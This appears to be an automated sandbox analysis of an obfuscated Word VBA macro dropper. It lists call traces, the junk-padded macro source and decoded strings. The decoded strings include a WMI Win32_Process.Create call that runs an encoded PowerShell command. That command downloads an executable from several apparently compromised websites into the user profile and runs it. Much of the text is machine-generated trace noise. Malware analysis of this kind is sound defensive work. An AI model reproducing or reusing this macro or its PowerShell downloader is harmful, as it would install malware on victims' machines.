                Part of subcall function R3tnEz2D@JIodCjfv: Tan

                Part of subcall function R3tnEz2D@JIodCjfv: DtWubh

                Part of subcall function R3tnEz2D@JIodCjfv: CDate

                Part of subcall function R3tnEz2D@JIodCjfv: NdN1rET

                Part of subcall function R3tnEz2D@JIodCjfv: NosNmj4

                Part of subcall function R3tnEz2D@JIodCjfv: kZ3OzYB

                Part of subcall function R3tnEz2D@JIodCjfv: TtIw36Hv

                Part of subcall function R3tnEz2D@JIodCjfv: CStr

                Part of subcall function R3tnEz2D@JIodCjfv: pkcNH7C

                Part of subcall function R3tnEz2D@JIodCjfv: rbJdmEz

                Part of subcall function R3tnEz2D@JIodCjfv: ZwwF3I

                Part of subcall function R3tnEz2D@JIodCjfv: qcOQjrD

                Part of subcall function R3tnEz2D@JIodCjfv: ChrW

                Part of subcall function R3tnEz2D@JIodCjfv: Oct

                Part of subcall function R3tnEz2D@JIodCjfv: CDate

                Part of subcall function R3tnEz2D@JIodCjfv: Fix

                Part of subcall function R3tnEz2D@JIodCjfv: mwv_hRR

                Part of subcall function R3tnEz2D@JIodCjfv: cCsukAJS

                Part of subcall function R3tnEz2D@JIodCjfv: T4t4PSN

                Part of subcall function R3tnEz2D@JIodCjfv: Sin

                Part of subcall function R3tnEz2D@JIodCjfv: WrztcmHX

                Part of subcall function R3tnEz2D@JIodCjfv: N06UkOi

                Part of subcall function R3tnEz2D@JIodCjfv: sNGNZi

                Part of subcall function R3tnEz2D@JIodCjfv: CreateObject

                Part of subcall function R3tnEz2D@JIodCjfv: lTzGN9z

                Part of subcall function R3tnEz2D@JIodCjfv: QFa7Tzv

                Part of subcall function R3tnEz2D@JIodCjfv: RI34Jc

                Part of subcall function R3tnEz2D@JIodCjfv: xqmm6672

                Part of subcall function R3tnEz2D@JIodCjfv: ZD4NzNKp

                Part of subcall function R3tnEz2D@JIodCjfv: dYFvGWI

                Part of subcall function R3tnEz2D@JIodCjfv: Tan

                Part of subcall function R3tnEz2D@JIodCjfv: OObwzR

                Part of subcall function R3tnEz2D@JIodCjfv: CDate

                Part of subcall function R3tnEz2D@JIodCjfv: EIw3Db08

                Part of subcall function R3tnEz2D@JIodCjfv: T1TAVR_L

                Part of subcall function R3tnEz2D@JIodCjfv: SXvvII2T

                Part of subcall function R3tnEz2D@JIodCjfv: S1hkHVH

                Part of subcall function R3tnEz2D@JIodCjfv: CStr

                Part of subcall function R3tnEz2D@JIodCjfv: a1QujnI

                Part of subcall function R3tnEz2D@JIodCjfv: uJwlJz

                Part of subcall function R3tnEz2D@JIodCjfv: Pt5_Krw

                Part of subcall function R3tnEz2D@JIodCjfv: mjvrs8a

                Part of subcall function R3tnEz2D@JIodCjfv: ChrW

                Part of subcall function R3tnEz2D@JIodCjfv: Oct

                Part of subcall function R3tnEz2D@JIodCjfv: CDate

                Part of subcall function R3tnEz2D@JIodCjfv: Fix

                Part of subcall function R3tnEz2D@JIodCjfv: df7KLz

                Part of subcall function R3tnEz2D@JIodCjfv: rLX5_E

                Part of subcall function R3tnEz2D@JIodCjfv: qhEL6us

                Part of subcall function R3tnEz2D@JIodCjfv: Sin

                Part of subcall function R3tnEz2D@JIodCjfv: RWp2lz

                Part of subcall function R3tnEz2D@JIodCjfv: DHQs26

                Part of subcall function R3tnEz2D@JIodCjfv: CKCNjv

                Part of subcall function R3tnEz2D@JIodCjfv: xqmm6672

                Part of subcall function R3tnEz2D@JIodCjfv: hUPJJL

                Part of subcall function R3tnEz2D@JIodCjfv: oihAvpA

                Part of subcall function R3tnEz2D@JIodCjfv: Tan

                Part of subcall function R3tnEz2D@JIodCjfv: DkkCTnu

                Part of subcall function R3tnEz2D@JIodCjfv: CDate

                Part of subcall function R3tnEz2D@JIodCjfv: mQZoi014

                Part of subcall function R3tnEz2D@JIodCjfv: uNL_Qm

                Part of subcall function R3tnEz2D@JIodCjfv: EhPXLwZr

                Part of subcall function R3tnEz2D@JIodCjfv: fzbTzG6

                Part of subcall function R3tnEz2D@JIodCjfv: CStr

                Part of subcall function R3tnEz2D@JIodCjfv: T6H6cL

                Part of subcall function R3tnEz2D@JIodCjfv: U4kTbL8o

                Part of subcall function R3tnEz2D@JIodCjfv: rkbEFdX

                Part of subcall function R3tnEz2D@JIodCjfv: Iofqhj

                Part of subcall function R3tnEz2D@JIodCjfv: ChrW

                Part of subcall function R3tnEz2D@JIodCjfv: Oct

                Part of subcall function R3tnEz2D@JIodCjfv: CDate

                Part of subcall function R3tnEz2D@JIodCjfv: Fix

                Part of subcall function R3tnEz2D@JIodCjfv: fIDOjLzQ

                Part of subcall function R3tnEz2D@JIodCjfv: qf2EbLqm

                Part of subcall function R3tnEz2D@JIodCjfv: AuOCYR

                Part of subcall function R3tnEz2D@JIodCjfv: Sin

                Part of subcall function R3tnEz2D@JIodCjfv: R65fhvwm

                Part of subcall function R3tnEz2D@JIodCjfv: FnZwmD_A

                Part of subcall function R3tnEz2D@JIodCjfv: KUA7zY

                Part of subcall function R3tnEz2D@JIodCjfv: xqmm6672

                Part of subcall function R3tnEz2D@JIodCjfv: ls9iOFd

                Part of subcall function R3tnEz2D@JIodCjfv: EnzDZGz

                Part of subcall function R3tnEz2D@JIodCjfv: Tan

                Part of subcall function R3tnEz2D@JIodCjfv: AtZoc6

                Part of subcall function R3tnEz2D@JIodCjfv: CDate

                Part of subcall function R3tnEz2D@JIodCjfv: uDNHZRDB

                Part of subcall function R3tnEz2D@JIodCjfv: MLzjlI

                Part of subcall function R3tnEz2D@JIodCjfv: OuoioTjO

                Part of subcall function R3tnEz2D@JIodCjfv: h0IdWK

                Part of subcall function R3tnEz2D@JIodCjfv: CStr

                Part of subcall function R3tnEz2D@JIodCjfv: Gtz6Hz

                Part of subcall function R3tnEz2D@JIodCjfv: NWWiIQQi

                Part of subcall function R3tnEz2D@JIodCjfv: S10zzpNS

                Part of subcall function R3tnEz2D@JIodCjfv: j7Ysl2IC

                Part of subcall function R3tnEz2D@JIodCjfv: ChrW

                Part of subcall function R3tnEz2D@JIodCjfv: Oct

                Part of subcall function R3tnEz2D@JIodCjfv: CDate

                Part of subcall function R3tnEz2D@JIodCjfv: Fix

                Part of subcall function R3tnEz2D@JIodCjfv: LInuIc64

                Part of subcall function R3tnEz2D@JIodCjfv: jR1PlbP

                Part of subcall function R3tnEz2D@JIodCjfv: cn3bSi

                Part of subcall function R3tnEz2D@JIodCjfv: Sin

                Part of subcall function R3tnEz2D@JIodCjfv: GY7qmRZw

                Part of subcall function R3tnEz2D@JIodCjfv: hfW56jn

                Part of subcall function R3tnEz2D@JIodCjfv: FJHJlhv

                khjUo3du

                xqmm6672

                wWOoNnTo

                MSfBRT

                Tan

                z5liGH

                CDate

                TuYSA6

                KWit9B

                tqXjFCw

                pSZQnNn

                CStr

                wT5D9BcE

                wMR9tP

                LDjJ6zM

                bUqA9z5

                ChrW

                Oct

                CDate

                Fix

                jYQWvaN

                vDZE63w

                UYGTL2Tr

                Sin

                CmXBWjb

                X975_m

                zcazMGDf

                xqmm6672

                Pu1R8IUO

                aXF2_4qQ

                Tan

                tcDLLb

                CDate

                lsaWRUr

                ShWp3jNB

                tnXUzJ0O

                MM3V6h

                CStr

                GdQwslU

                j_72KM

                HpAvVal

                cLEAWn

                ChrW

                Oct

                CDate

                Fix

                lA6KKk

                J3J3pfPR

                hzkYTP82

                Sin

                cISYkJs

                Sff8wzaz

                B8wUj_W

                StringsDecrypted Strings
                "IuH3IuH3wIuH3iIuH3nmgIuH3mtIuH3sIuH3IuH3:IuH3WIuH3IuH3iIuH3n3IuH32_PIuH3roIuH3cIuH3eIuH3ssIuH3"
                LineInstructionMeta Information
                2

                Function dztj37()

                3

                On Error Resume Next

                executed
                4

                Set mna = xqmm6672

                xqmm6672

                5

                Do

                PcG7it_

                zir7hM

                6

                If M3oCwG = PFAGKSc Then

                M3oCwG

                PFAGKSc

                7

                HnhIwa = Tan(1141)

                Tan

                8

                Endif

                9

                R6wTtT = Btc0KuW * CDate(fCMUHn) / pUBdAcb / WLAEkzsu + (z5_aQ54 / CStr(q2NS516) / 3 * CStr(uBRAVT))

                Btc0KuW

                CDate

                fCMUHn

                pUBdAcb

                WLAEkzsu

                z5_aQ54

                CStr

                q2NS516

                uBRAVT

                10

                For Each jMCQik in tkw6vj

                tkw6vj

                11

                CzAN5H = oc2GT0i - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(FRqJIU) - 6977 - MAPHFj - A9hSFQf9 * Sin(Bt4u6CG)

                oc2GT0i

                ChrW

                Oct

                CDate

                Fix

                FRqJIU

                MAPHFj

                A9hSFQf9

                Sin

                Bt4u6CG

                12

                Next

                tkw6vj

                13

                Loop Until PcG7it_ = zir7hM

                PcG7it_

                zir7hM

                14

                kMmT3s = vq219c + UMvDUH(ThisDocument.zJWspwz + ThisDocument.VHfL_K2S) + YAHvQ_

                vq219c

                zJWspwz

                VHfL_K2S

                YAHvQ_

                15

                On Error Resume Next

                16

                Set mna = xqmm6672

                xqmm6672

                17

                Do

                lnY3HW

                jXUw9Oz

                18

                If LXv84MXp = JSjBjs Then

                LXv84MXp

                JSjBjs

                19

                rZcdZKRX = Tan(1141)

                Tan

                20

                Endif

                21

                wD6C32mJ = TAw0Fzm * CDate(C0DzNIbd) / dpjKqtAS / iaXsMY1 + (TniCd0t / CStr(k5bY2L) / 3 * CStr(t1HQFfiz))

                TAw0Fzm

                CDate

                C0DzNIbd

                dpjKqtAS

                iaXsMY1

                TniCd0t

                CStr

                k5bY2L

                t1HQFfiz

                22

                For Each fVn1T1_ in BnCM82w

                BnCM82w

                23

                zQkMRi = ZNRIEN - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(Ghn4llZ) - 6977 - UF1nKaU6 - wDZDIUTV * Sin(L8Zz21)

                ZNRIEN

                ChrW

                Oct

                CDate

                Fix

                Ghn4llZ

                UF1nKaU6

                wDZDIUTV

                Sin

                L8Zz21

                24

                Next

                BnCM82w

                25

                Loop Until lnY3HW = jXUw9Oz

                lnY3HW

                jXUw9Oz

                27

                CreateObject(UMvDUH("IuH3IuH3wIuH3iIuH3nmgIuH3mtIuH3sIuH3IuH3:IuH3WIuH3IuH3iIuH3n3IuH32_PIuH3roIuH3cIuH3eIuH3ssIuH3")).Create kMmT3s, ZKnIZEfd, R3tnEz2D, khjUo3du

                SWbemObjectEx.Create("powershell -encod JABtAEgASwB3AFIARgA9ACcASgBJAGIAbgB2AGYAbwBMACcAOwAkAGIAMwBhAFMAaQBtADQAXwAgAD0AIAAnADkAOAAyACcAOwAkAEcAdgBIAEsAMgBNAD0AJwBuAF8AdgBQAGoAcgBwACcAOwAkAFEAegBpAEEAQgBCADYATAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYgAzAGEAUwBpAG0ANABfACsAJwAuAGUAeABlACcAOwAkAGoAdwB0ADcAXwBOAD0AJwBaADYARwA2AG8AVABvAFMAJwA7ACQAegBfAG4AZgAwADkAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAEUASQBwAFMARwB3AHUAPQAnAGgAdAB0AHAAcwA6AC8ALwBzAGEAYgBpAG8AcwBkAGUAbABhAG0AbwByAC4AYwBvAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFYAdAB5AEUAcQBvAEUAbABvAC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBlAHUAcgBvAGEAdQBzAGkAbABpAC4AaQB0AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGkASQBGAFMAWABUAFcAbQBOAC8AQABoAHQAdABwAHMAOgAvAC8AbwBwAGUAbAAuAGsAbQAuAHUAYQAvAGIAbABvAGcAcwAvADMAdQBqAHUAXwB0AGkAbwB3AGYAOQBpAC0AMQA0ADkALwBAAGgAdAB0AHAAcwA6AC8ALwBoAGEAYgBsAGEAYgBlAHMAdABvAHAALgBsAGkAdgBlAC8AcgBxAGIAZQA5AHAALwBwAEsAawBMAGkAdQBxAEcAagAvAEAAaAB0AHQAcABzADoALwAvAGQAbwBnAG8AbgBnAHUAbABvAG4AZwAuAHYAbgAvAHcAcAAtAGEAZABtAGkAbgAvAHYAYQBJAEQAZQB5AEQAagAvACcALgAiAHMAUABgAGwAaQBUACIAKAAnAEAAJwApADsAJABYAG4AOQBUAGoAcQBpAD0AJwBXADUANAA4AEcAUABiAGkAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEMAaQBYAEgAaQBXACAAaQBuACAAJABFAEkAcABTAEcAdwB1ACkAewB0AHIAeQB7ACQAegBfAG4AZgAwADkALgAiAGQAYABvAHcAYABOAGAAbABPAEEARABGAEkAbABlACIAKAAkAEMAaQBYAEgAaQBXACwAIAAkAFEAegBpAEEAQgBCADYATAApADsAJABIAEkAaQBIAFcAVwBTAGYAPQAnAGoASAA4AG8ASQBNACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQAUQB6AGkAQQBCAEIANgBMACkALgAiAGwAZQBOAGAAZwB0AEgAIgAgAC0AZwBlACAAMwAyADMAOAA1ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABgAEEAcgB0ACIAKAAkAFEAegBpAEEAQgBCADYATAApADsAJABLAEMAYgBzAGoAawA9ACcAdwBBAHAATQB2AGEAYQAnADsAYgByAGUAYQBrADsAJAB2AGoAbAA4AFEATAB3AD0AJwBRADgAUAB6ADUAbgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABBADEAcwBhAEIAaAA9ACcAUQBpAEIANgA3AHIAaAA0ACcA",,,) -> 0

                ZKnIZEfd

                khjUo3du

                executed
                28

                On Error Resume Next

                29

                Set mna = xqmm6672

                xqmm6672

                30

                Do

                X975_m

                zcazMGDf

                31

                If wWOoNnTo = MSfBRT Then

                wWOoNnTo

                MSfBRT

                32

                QvB9VD = Tan(1141)

                Tan

                33

                Endif

                34

                z8FYLah = z5liGH * CDate(TuYSA6) / KWit9B / tqXjFCw + (pSZQnNn / CStr(wT5D9BcE) / 3 * CStr(wMR9tP))

                z5liGH

                CDate

                TuYSA6

                KWit9B

                tqXjFCw

                pSZQnNn

                CStr

                wT5D9BcE

                wMR9tP

                35

                For Each mjHV7os in LDjJ6zM

                LDjJ6zM

                36

                XzsVHACu = bUqA9z5 - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(jYQWvaN) - 6977 - vDZE63w - UYGTL2Tr * Sin(CmXBWjb)

                bUqA9z5

                ChrW

                Oct

                CDate

                Fix

                jYQWvaN

                vDZE63w

                UYGTL2Tr

                Sin

                CmXBWjb

                37

                Next

                LDjJ6zM

                38

                Loop Until X975_m = zcazMGDf

                X975_m

                zcazMGDf

                40

                On Error Resume Next

                41

                Set mna = xqmm6672

                xqmm6672

                42

                Do

                Sff8wzaz

                B8wUj_W

                43

                If Pu1R8IUO = aXF2_4qQ Then

                Pu1R8IUO

                aXF2_4qQ

                44

                EaYS6RQw = Tan(1141)

                Tan

                45

                Endif

                46

                nkfcdqD = tcDLLb * CDate(lsaWRUr) / ShWp3jNB / tnXUzJ0O + (MM3V6h / CStr(GdQwslU) / 3 * CStr(j_72KM))

                tcDLLb

                CDate

                lsaWRUr

                ShWp3jNB

                tnXUzJ0O

                MM3V6h

                CStr

                GdQwslU

                j_72KM

                47

                For Each mWYlNTFO in HpAvVal

                HpAvVal

                48

                iE7w_S0 = cLEAWn - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(lA6KKk) - 6977 - J3J3pfPR - hzkYTP82 * Sin(cISYkJs)

                cLEAWn

                ChrW

                Oct

                CDate

                Fix

                lA6KKk

                J3J3pfPR

                hzkYTP82

                Sin

                cISYkJs

                49

                Next

                HpAvVal

                50

                Loop Until Sff8wzaz = B8wUj_W

                Sff8wzaz

                B8wUj_W

                51

                End Function

                Function UMvDUH, APIs: 53, Strings: 3, Number of lines: 25, Relevance: 103.275
                APIsMeta Information

                xqmm6672

                CP2pOzYD

                m_MLhXX

                Tan

                huhEoJG

                CDate

                az_UGd0

                a21jZbL3

                pn7zEK

                N0vGGku

                CStr

                fMoOoWO3

                EUG4z12

                nP1obkp

                HG0RQi

                ChrW

                Oct

                CDate

                Fix

                zqDQZ7

                YjRQrq

                Hz5p3D

                Sin

                mjjrHIf

                Xb5lam

                diSWXniz

                Replace

                		Replace("09NhI09NhuH09Nh309Nh","09Nh","") -> IuH3 Replace("poweIuH3rsheIuH3ll -IuH3encoIuH3d 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,"IuH3","") -> powershell -encod JABtAEgASwB3AFIARgA9ACcASgBJAGIAbgB2AGYAbwBMACcAOwAkAGIAMwBhAFMAaQBtADQAXwAgAD0AIAAnADkAOAAyACcAOwAkAEcAdgBIAEsAMgBNAD0AJwBuAF8AdgBQAGoAcgBwACcAOwAkAFEAegBpAEEAQgBCADYATAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYgAzAGEAUwBpAG0ANABfACsAJwAuAGUAeABlACcAOwAkAGoAdwB0ADcAXwBOAD0AJwBaADYARwA2AG8AVABvAFMAJwA7ACQAegBfAG4AZgAwADkAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAEUASQBwAFMARwB3AHUAPQAnAGgAdAB0AHAAcwA6AC8ALwBzAGEAYgBpAG8AcwBkAGUAbABhAG0AbwByAC4AYwBvAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFYAdAB5AEUAcQBvAEUAbABvAC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBlAHUAcgBvAGEAdQBzAGkAbABpAC4AaQB0AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGkASQBGAFMAWABUAFcAbQBOAC8AQABoAHQAdABwAHMAOgAvAC8AbwBwAGUAbAAuAGsAbQAuAHUAYQAvAGIAbABvAGcAcwAvADMAdQBqAHUAXwB0AGkAbwB3AGYAOQBpAC0AMQA0ADkALwBAAGgAdAB0AHAAcwA6AC8ALwBoAGEAYgBsAGEAYgBlAHMAdABvAHAALgBsAGkAdgBlAC8AcgBxAGIAZQA5AHAALwBwAEsAawBMAGkAdQBxAEcAagAvAEAAaAB0AHQAcABzADoALwAvAGQAbwBnAG8AbgBnAHUAbABvAG4AZwAuAHYAbgAvAHcAcAAtAGEAZABtAGkAbgAvAHYAYQBJAEQAZQB5AEQAagAvACcALgAiAHMAUABgAGwAaQBUACIAKAAnAEAAJwApADsAJABYAG4AOQBUAGoAcQBpAD0AJwBXADUANAA4AEcAUABiAGkAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEMAaQBYAEgAaQBXACAAaQBuACAAJABFAEkAcABTAEcAdwB1ACkAewB0AHIAeQB7ACQAegBfAG4AZgAwADkALgAiAGQAYABvAHcAYABOAGAAbABPAEEARABGAEkAbABlACIAKAAkAEMAaQBYAEgAaQBXACwAIAAkAFEAegBpAEEAQgBCADYATAApADsAJABIAEkAaQBIAFcAVwBTAGYAPQAnAGoASAA4AG8ASQBNACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQAUQB6AGkAQQBCAEIANgBMACkALgAiAGwAZQBOAGAAZwB0AEgAIgAgAC0AZwBlACAAMwAyADMAOAA1ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABgAEEAcgB0ACIAKAAkAFEAegBpAEEAQgBCADYATAApADsAJABLAEMAYgBzAGoAawA9ACcAdwBBAHAATQB2AGEAYQAnADsAYgByAGUAYQBrADsAJAB2AGoAbAA4AFEATAB3AD0AJwBRADgAUAB6ADUAbgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABBADEAcwBhAEIAaAA9ACcAUQBpAEIANgA3AHIAaAA0ACcA Replace("IuH3IuH3wIuH3iIuH3nmgIuH3mtIuH3sIuH3IuH3:IuH3WIuH3IuH3iIuH3n3IuH32_PIuH3roIuH3cIuH3eIuH3ssIuH3","IuH3","") -> winmgmts:Win32_Process Replace(winmIuH3gmtsIuH3:WinIuH332_PIuH3roceIuH3ssStIuH3artuIuH3p,"IuH3","") -> winmgmts:Win32_ProcessStartup

                xqmm6672

                wMBYtY

                O_vT8j

                Tan

                EqHGmqzs

                CDate

                p2VQvUjT

                nJES0LA

                WiwqHbr

                XzCzPS7

                CStr

                FfJUME

                wlzHbq

                t3Fh05z

                aGJjAH

                ChrW

                Oct

                CDate

                Fix

                F97Z_Sb

                Q0hGCzd

                ojvDCQi

                Sin

                wNX30a

                qaB0m7mo

                E9cRqzhV

                StringsDecrypted Strings
                """"
                "09Nh"
                "09NhI09NhuH09Nh309Nh"
                LineInstructionMeta Information
                52

                Function UMvDUH(jNQUnno)

                53

                On Error Resume Next

                executed
                54

                Set mna = xqmm6672

                xqmm6672

                55

                Do

                Xb5lam

                diSWXniz

                56

                If CP2pOzYD = m_MLhXX Then

                CP2pOzYD

                m_MLhXX

                57

                UPMZSQ = Tan(1141)

                Tan

                58

                Endif

                59

                busmGEX = huhEoJG * CDate(az_UGd0) / a21jZbL3 / pn7zEK + (N0vGGku / CStr(fMoOoWO3) / 3 * CStr(EUG4z12))

                huhEoJG

                CDate

                az_UGd0

                a21jZbL3

                pn7zEK

                N0vGGku

                CStr

                fMoOoWO3

                EUG4z12

                60

                For Each d_7JYztz in nP1obkp

                nP1obkp

                61

